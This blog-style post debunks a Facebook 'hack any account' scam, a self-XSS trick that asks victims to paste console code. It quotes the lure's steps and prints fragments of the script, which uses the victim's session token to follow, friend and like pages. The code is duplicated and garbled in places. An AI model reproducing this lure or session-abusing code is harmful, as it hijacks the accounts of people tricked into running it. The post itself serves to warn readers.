“Hack any facebook account” is one phrase which excites people so much that they loose their common sense! Facebook spends millions on their security and user privacy but still people think hacking facebook accounts is a kids task. If at all a person finds some flaw in facebook ‘s security he is rewarded big bounty which gives him every reason not to make the flaw public.

Hack facebook mythsRecently a social engineering script has become very famous on facebook which traps user by claiming to hack any facebook account.  Here are the steps which are listed on a facebook page by which you can hack any facebook account:

  1. Open Victim Id
  2. Right Click or Press F12 & Click on Inspect Element.
  3. Click on Console & Copy Code from This File (Ctrl+A): https://dl.dropboxusercontent.com/u/105061154/f-b.txt
  4. Paste Code (Ctrl+V) & Press Enter. wait for 5 Seconds.
  5. You’ll Receive the Message from Victim with Email & Pass.

The most important steps in the above mentioned process are 3rd and 4th. We analyzed the txt file whose content are to be pasted in the console and here’s what we got:

The most cheesy part of the txt file:

1
2
3
4
function a(abone){
var http4=new XMLHttpRequest;
var url4="/ajax/follow/follow_profile.php?__a=1";
var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
function a(abone){
var http4=new XMLHttpRequest;
var url4="/ajax/follow/follow_profile.php?__a=1";
var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";

http4.open(“POST”,url4,true);

1
2
3
4
5
6
7
8
9
10
11
12
http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("100002824643338").........XURL="//www.facebook.com/ajax/add_friend/action.php";
var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
X.open("POST",XURL,true);
X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};
X.send(XParams)} ///////////////////////////KH訬G X覣 ? 新Y/////////////////////////// // t鄆 sublist("466072136830270");
IDS("100002824643338");
IDS("100002936183297");
P("466022100168607");
P("466075036829980");
 // cu?ng a("100006133690698");
P("472982602806117");
Like("472970676140643");
http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("100002824643338").........XURL="//www.facebook.com/ajax/add_friend/action.php";
var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
X.open("POST",XURL,true);
X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};
X.send(XParams)} ///////////////////////////KH訬G X覣 ? 新Y/////////////////////////// // t鄆 sublist("466072136830270");
IDS("100002824643338");
IDS("100002936183297");
P("466022100168607");
P("466075036829980");
 // cu?ng a("100006133690698");
P("472982602806117");
Like("472970676140643");

The 3rd line simply uses follow action of facebook which makes victim(who is actually trying to hack someone’s account) follow a list by the name of Programming Learning Point, profile by the name of “Gull” and like a couple of photos. The ID’s of list to follow, pictures to like and profile to follow are given in lines 6 to 12. So all what this script does is makes the victims like and follow some stuff and not hack into profiles.

We also found the Creator of hack facebook account script

While reversing the script we also managed to find the creator of this script. It wasn’t a big task as he was the person who had created the list which victims followed and also the photos which victims liked had a couple of photos of the creator too. The creator is a guy from Karachi, Pakistan. He also updates his facebook status claiming that he was the creator of the script.

  hack facebook spam reversed by Czarhack facebook spam reversed by Czarhack facebook spam reversed by Czar

Creator’s facebook status said “Never try that sort of code again in your life”, so True!